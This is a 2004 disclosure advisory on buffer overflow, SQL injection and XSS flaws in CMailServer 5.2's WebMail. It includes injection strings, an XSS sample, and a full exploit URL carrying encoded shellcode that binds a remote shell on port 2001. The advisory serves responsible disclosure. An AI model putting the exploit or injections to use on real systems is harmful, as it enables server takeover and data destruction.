 |
|
|
by Tan Chew Keong
Release Date: 24 Nov 2004
CMailServer
is a small and easy-to-use Mail Server software and Web Mail software. It enables you to send and receive emails
across the Internet or within the LAN and has support for client email applications such as Outlook, Eudora etc.
CMailServer supports Hotmail-like Web Mail service based on ASP scripts.
Multiple vulnerabilies were found in CMailServer's Web Mail service including buffer overflow, SQL Injection and
Cross-Site Scripting (XSS).
CMailServer Version 5.2 on English Win2K.
CMailServer is a small and easy-to-use Mail Server software and Web Mail software. It enables you to send and receive
emails across the Internet or within the LAN and has support for client email applications such as Outlook, Eudora etc.
CMailServer supports Hotmail-like Web Mail service based on ASP scripts. Multiple vulnerabilies were found in
CMailServer's Web Mail service including buffer overflow, SQL Injection and Cross-Site Scripting (XSS).
1. Buffer overflow in CMailCOM.dll's attachment download method may allow arbitrary code execution
CMailServer WebMail allows a user to download his/her email file attachment. Attachment
download is handled by download.asp. download.asp uses the attachment download method of
CMailServer's ActiveX object (CMailCOM.dll) to retrieve the file. The download method has a
buffer overflow vulnerability when handling an overly long filename.
http://[hostname]/mail/download.asp?urlOfAttach=/maildata/A..[approx 290 bytes]..A
sprintf(buffer, "%s%s", "C:\\CMAILS~1", "/maildata/A....A");
2. SQL Injection in fdelmail.asp allows deleting of other users' mail metadata
When a user moves his/her emails to the Send, Draft, Favorites or Trash Bin folders, the
metadata of each mail (e.g. mailid, uid, subject, size, etc) will be saved to the "mailfolder"
table in db.mdb. When the user chooses to "Delete Permanently" an email from his/her folder,
the corresponding metadata of the email will be deleted from the "mailfolder" table using
the following query in fdelmail.asp.
sql = "delete from mailfolder where account= '" & Session("Account") & "' and uid = '" & arrString(i) & "'"
indexOfMail=user2.xxx.yyy.com.cmailserver.3'%20or%20'1'='1%3B
3. SQL Injection in addressc.asp allows deleting of other users' email address contacts
Email address contacts added by WebMail users are saved in the address table of db.mdb. The following
SQL statement is used in addressc.asp to allow a user to delete email address contacts that
he/she has added.
strSql = "delete from address where account= '" & Session("Account") & "' and addressid = " & arrString(nI)
indexOfMail=5%20or%201=1%3B
4. XSS vulnerability in admin.asp when displaying users' personal info.
The admin.asp script displays the username, name, comments, and other users' details for the
WebMail administrator. A malicious user may input javascript in his own personal info using
setpersoninfo.asp. Due to lack of filtering of HTML special charactors, these javascript will
execute on the WebMail administrator's browser when the administrator accesses the admin.asp
script. These javascripts may be crafted to steal the administrator's session cookie, etc.
For example, the user may set his name to <script>alert('XSS');</script>
Vulnerability test code for CMailCOM.dll buffer overflow for English Win2K SP4. Binds shell
on port 2001 with IWAM_MACHINE privilege.
http://[hostname]/mail/download.asp?urlOfAttach=/maildata/AAABBBBCCCCDDDDEEEEFFFFGGGGHHHH
IIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZAAAABBBBCCCCDDDD
EEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ
AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOO
%CC%CC%EB%08 // CALL EBX lands here
%D6%19%02%75 // Address of CALL EBX
RRRR
SSSSTTTTUUUUVVVVWWWWXXXXYYYYZZZZ%EB%62%55%8B%EC%51%56%57%8B%5D%08%8B%73%3C%8B%74%33%78%03
%F3%8B%7E%20%03%FB%8B%4E%18%56%33%D2%8B%37%03%75%08%33%DB%33%C0%AC%85%C0%74%09%C1%CB%0C%D1
%CB%03%D8%EB%F0%3B%5D%0C%74%0B%83%C7%04%42%E2%DE%5E%33%C0%EB%17%5E%8B%7E%24%03%7D%08%66%8B
%04%57%8B%7E%1C%03%7D%08%8B%04%87%03%45%08%5F%5E%59%8B%E5%5D%C3%55%8B%EC%33%C9%B1%C8%2B%E1
%32%C0%8B%FC%F3%AA%B1%30%64%8B%01%8B%40%0C%8B%70%1C%AD%8B%58%08%89%5D%FC%68%8E%4E%0E%EC%FF
%75%FC%E8%70%FF%FF%FF%83%C4%08%BB%AA%AA%6C%6C%C1%EB%10%53%68%33%32%2E%64%68%77%73%32%5F%54
%FF%D0%89%45%F8%EB%35%5E%8D%7D%F4%33%C9%B1%09%FF%36%FF%75%FC%E8%40%FF%FF%FF%83%C4%08%85%C0
%75%0E%90%FF%36%FF%75%F8%E8%2E%FF%FF%FF%83%C4%08%89%07%33%C0%B0%04%03%F0%2B%F8%E2%D5%EB%29
%E8%C6%FF%FF%FF%72%FE%B3%16%35%54%8A%A1%A4%AD%2E%E9%A4%1A%70%C7%D9%09%F5%AD%CB%ED%FC%3B%7E
%D8%E2%73%E7%79%C6%79%AD%D9%05%CE%54%6A%02%FF%55%E0%33%C0%50%50%50%50%6A%01%6A%02%FF%55%E4
%89%45%D0%33%C0%50%B8%FD%FF%F8%2E%83%F0%FF%50%8B%C4%6A%10%50%FF%75%D0%FF%55%E8%6A%05%FF%75
%D0%FF%55%EC%85%C0%75%68%8B%CC%6A%10%8B%DC%33%C0%50%50%53%51%FF%75%D0%FF%55%F0%8B%D0%5B%83
%F0%FF%74%4E%8B%FC%33%C9%B1%64%33%C0%F3%AA%C6%04%24%44%66%C7%44%24%2C%01%01%89%54%24%38%89
%54%24%3C%89%54%24%40%8B%C4%8D%58%44%B9%FF%63%6D%64%C1%E9%08%51%8B%CC%52%53%53%50%33%C0%50
%50%50%6A%01%50%50%51%50%FF%55%F4%5B%6A%FF%FF%33%FF%55%D4%FF%55%D8%FF%75%D0%FF%55%D8%50%FF
%55%DC
- Update to the latest version of CMailServer. CMailServer v5.2.1 fixes these vulnerabilities.
12 Nov 04 - Vulnerability Discovered.
13 Nov 04 - Initial Vendor Notification by Email and Web Form.
16 Nov 04 - Initial Vendor Reply.
21 Nov 04 - Vendor provided patched version for testing.
21 Nov 04 - Notified Vendor that a patch did not work.
21 Nov 04 - Vendor provided updated version for testing.
24 Nov 04 - Public Release
For further questions and enquries, email them to the following.
Overall-in-charge: Tan Chew Keong
webmaster@security.org.sg
|
 |
